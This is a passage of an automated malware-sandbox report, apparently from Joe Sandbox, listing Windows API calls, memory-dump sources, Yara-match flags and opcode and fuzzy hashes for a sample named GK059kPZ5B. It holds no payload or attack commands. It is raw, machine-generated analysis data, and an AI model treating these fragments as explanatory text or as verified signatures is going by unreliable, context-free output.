                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00A8BD14,?,00000000), ref: 00A8BAB7
                                                            • GetACP.KERNEL32(?,?,00A8BD14,?,00000000), ref: 00A8BACC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: ACP$OCP
                                                            • API String ID: 2299586839-711371036
                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction ID: 69d26ea5532217f391236ded87458565988122062f1fbd3b949f781652e852e5
                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                            • Instruction Fuzzy Hash: 1421B332624105EBD738EF54D901A97F7A6EF54F90B568464E90AD7110F732DE40C374
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                            • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                            • String ID:
                                                            • API String ID: 2287132625-0
                                                            • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                            • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                            • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                            • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A821C0
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00A8BCD5
                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00A8BD30
                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00A8BD3F
                                                            • GetLocaleInfoW.KERNEL32(?,00001001,00A80A3C,00000040,?,00A80B5C,00000055,00000000,?,?,00000055,00000000), ref: 00A8BD87
                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00A80ABC,00000040), ref: 00A8BDA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                            • String ID:
                                                            • API String ID: 2287132625-0
                                                            • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                            • Instruction ID: 898389581bca1d5318f7273d2a579cfec0e57da57ea81347cc49437f092a2de7
                                                            • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                            • Instruction Fuzzy Hash: 55518FB1A1020AEBDB10FFA5CC45ABEB7B8FF09700F144569E915E7190EB719A04CB71
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                            • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                            • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                            • String ID:
                                                            • API String ID: 2444527052-0
                                                            • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                            • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                            • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                            • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A80A43,?,?,?,?,00A8049A,?,00000004), ref: 00A8B373
                                                            • _wcschr.LIBVCRUNTIME ref: 00A8B403
                                                            • _wcschr.LIBVCRUNTIME ref: 00A8B411
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00A80A43,00000000,00A80B63), ref: 00A8B4B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                            • String ID:
                                                            • API String ID: 2444527052-0
                                                            • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                            • Instruction ID: 633899c124e22556aec8e21f546c3aebbf08c46759d91ab15c7289fa4f9b0130
                                                            • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                            • Instruction Fuzzy Hash: 86610471A10206AAEB24BF75CD42BBB73ACFF04710F14442AF906DB582EB74E94187B5
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: 11@$GetLocaleInfoEx
                                                            • API String ID: 2299586839-1075713910
                                                            • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                            • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                            • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                            • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorInfoLastLocale$_free
                                                            • String ID:
                                                            • API String ID: 2834031935-0
                                                            • Opcode ID: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                            • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                            • Opcode Fuzzy Hash: f153121c08e24ac243ec409ba6aebefbe294cb333e2e14397e380fa81c54f75c
                                                            • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                            • Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
                                                            • Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                            • Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00A5DAFC), ref: 00A7A752
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00A5DAFC), ref: 00A7A75C
                                                            • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00A5DAFC), ref: 00A7A769
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                            • Instruction ID: 29b5190f8c5aefa9b10c2e5c85ceb97b3f2097709ce5880aef11d2c3946aa3c4
                                                            • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                            • Instruction Fuzzy Hash: 4531E67590121CABCB21DF68DD88B8DBBB8BF18710F5081EAE81CA7251E7709F858F45
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                            • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                            • ExitProcess.KERNEL32 ref: 0042FEB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002,00000000), ref: 00A80107
                                                            • TerminateProcess.KERNEL32(00000000,?,00A800BC,00000000,00457970,0000000C,00A80213,00000000,00000002,00000000), ref: 00A8010E
                                                            • ExitProcess.KERNEL32 ref: 00A80120
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction ID: fac8ede27b653ae9dcb5637ef02e6ebb8227627187e60d45abcea8e9d1ab5aa8
                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                            • Instruction Fuzzy Hash: 8DE04632000548EBCF01BFA0CE4DE493B69EB06F52B004124F9048B122CB35DE42CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 62f54037f6a06eb945785101eb122e187aa1763278cb27456dade5ba50ac39ea
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: 523139B6900609DFDB10CF99C880AAEBBF9FF48325F25404AD841A7315D771EA49CBA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /
                                                            • API String ID: 0-2043925204
                                                            • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                            • Instruction ID: a227ec02499bfe1bfd98fe0f4147e6b501038b1cbe903e33c1bef616cbd9e7fb
                                                            • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                            • Instruction Fuzzy Hash: 48412A725003196ECB20EFB9DC49DABB778EB88714F10426EF905D7280EA34AD41CB58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /
                                                            • API String ID: 0-2043925204
                                                            • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                            • Instruction ID: f53bb76507e7556771e9f4991c60f24e55593d1db7c4ce1b22e9f0e06827a878
                                                            • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                            • Instruction Fuzzy Hash: 44412972900219AFCB20EFB9DC89EBB77B8EB84710F504269F905D7180EA75DD41CB50
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00A8049A,?,00000004), ref: 00A8549A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: 11@
                                                            • API String ID: 2299586839-1785270423
                                                            • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                            • Instruction ID: 8a65f6d72bdce8e61e00b82eceb1241028e8586c1173717da76a112cbb3b681e
                                                            • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                            • Instruction Fuzzy Hash: 90F02431A80718BFDB01BF70CD02F6E7B21EF05B12F504165FC0667290DA728E20A789
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                            • Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
                                                            • Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                            • Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                            • Instruction ID: 5c1d231a849116be24efe51874d35fc87d4e28422700b495b26c726b0df8bdc4
                                                            • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                            • Instruction Fuzzy Hash: F8021A71E012199FDF14CFA9C9806AEB7F1EF88314F25C26AD919E7345E731AA41CB90
                                                            APIs
                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00A52648
                                                            • PostQuitMessage.USER32(00000000), ref: 00A527EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A86F41,?,?,00000008,?,?,00A8F402,00000000), ref: 00A87173
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$InfoLocale
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A821C0
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A8B920
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free$InfoLocale
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,00A80A3C,?,00A8BCA9,00000000,?,?,?), ref: 00A8B5C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale_free
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A821C0
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A8B920
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free$InfoLocale
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A8B89A,00000000,00000000,?), ref: 00A8BB28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$InfoLocale_free
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
